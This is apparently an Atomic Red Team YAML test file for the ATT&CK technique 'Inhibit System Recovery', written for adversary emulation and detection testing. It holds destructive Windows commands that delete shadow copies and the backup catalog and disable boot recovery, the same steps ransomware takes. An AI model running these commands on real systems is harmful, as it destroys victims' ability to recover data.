Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
61 lines
1.6 KiB
YAML
61 lines
1.6 KiB
YAML
---
|
|
attack_technique: T1490
|
|
display_name: Inhibit System Recovery
|
|
|
|
atomic_tests:
|
|
- name: Windows - Delete Volume Shadow Copies
|
|
description: |
|
|
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
vssadmin.exe delete shadows /all /quiet
|
|
|
|
- name: Windows - Delete Volume Shadow Copies via WMI
|
|
description: |
|
|
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
wmic.exe shadowcopy delete
|
|
|
|
|
|
- name: Windows - Delete Windows Backup Catalog
|
|
description: |
|
|
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
wbadmin.exe delete catalog -quiet
|
|
|
|
- name: Windows - Disable Windows Recovery Console Repair
|
|
description: |
|
|
Disables repair by the Windows Recovery Console on boot.
|
|
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: true
|
|
command: |
|
|
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
|
|
bcdedit.exe /set {default} recoveryenabled no
|
|
|